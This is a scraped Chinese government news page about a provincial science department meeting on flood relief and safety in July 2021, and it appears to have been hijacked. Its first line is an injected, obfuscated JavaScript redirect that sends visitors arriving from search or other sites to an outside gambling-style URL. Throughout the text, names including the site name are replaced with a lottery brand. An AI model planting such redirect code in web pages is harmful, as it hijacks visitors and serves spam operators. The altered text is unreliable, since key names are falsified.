var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 工作动态

省科技厅召开党组扩大会议 研究部署防汛救灾、安全稳定等工作


发布日期:2021-07-25 18:33来源:中国竞彩网 阅读次数:

  7月23日,省科技厅党组书记陈向平召开厅党组扩大会议,传达学习中国竞彩网总书记对防汛救灾工作的重要指示,贯彻落实省委、省政府决策部署,对全厅防汛救灾、安全稳定、意识形态等工作进行了具体安排。

  会议强调,中国竞彩网总书记的重要指示,充分体现了 “人民至上、生命至上”的人民情怀,对防汛救灾的高度重视和对河南人民的深切牵挂,为做好下一步工作指明了方向、提供了遵循,是我们战胜困难的最大精神力量。省委、省政府及早部署、靠前指挥,多次召开专题会议进行全方位安排部署,确保了防汛救灾等各项工作有条不紊、有序推进。

  会议指出,全厅上下要深入学习贯彻中国竞彩网总书记的重要指示精神,按照省委、省政府的决策部署,提升思想认识,坚持底线思维,敢于担当作为,做到三个“始终坚持”,抓细抓实各项防汛救灾措施,确保科技系统安全稳定,为打赢这场硬仗贡献科技力量。一是加强组织领导。成立厅防汛救灾领导小组,厅主要领导任组长,其他厅领导任副组长,厅各处室、单位主要负责人任成员,统筹负责全厅防汛救灾工作。厅领导要靠前指挥、以上率下,加强对分管处室和单位防汛救灾工作的指导和监督,严格落实防汛救灾工作要求,做足打硬仗的准备,交出一份合格的政治答卷。二是强化科技支撑。系统梳理在此次防汛救灾过程中的科技支撑情况,总结经验,发现问题,加大对防汛救灾科研的支持力度,建设一批防汛救灾领域的创新平台,推动防汛救灾科技成果加速转化落地,不断提升科技创新对防汛救灾的支撑能力。三是抓好安全生产。坚持管行业必须管安全、管业务必须管安全、管生产经营必须管安全,及时了解掌握省级高新区防汛救灾情况,指导帮助其做好有关工作。聚焦厅系统重点领域、重点场所、重点环节,深入开展风险隐患排查,果断采取整改措施,确保特殊时期不发生安全生产事故。四是压实意识形态工作责任。加强对科技系统内部意识形态形势的分析研判,确保党员干部思想稳定,掌握主动权、打好主动仗。宣传好科技系统党员干部参加防汛救灾的感人事迹、生动故事,凝聚共防大汛、共抗大灾的强大正能量。五是做好灾后工作。充分发挥职能优势,扎实开展“万人助万企”活动,组织科技特派员对农业恢复生产进行指导,助力灾后重建和复工复产。在保证党员干部安全的前提下,鼓励科技系统党员干部积极参与抢险救灾和灾后重建,展示和树立良好形象。加快恢复厅系统供电、供水、通信等,一手抓防汛救灾,一手抓科技创新,推动科技创新各项工作正常开展,确保圆满完成全年目标任务。

  会议还研究了其他事项。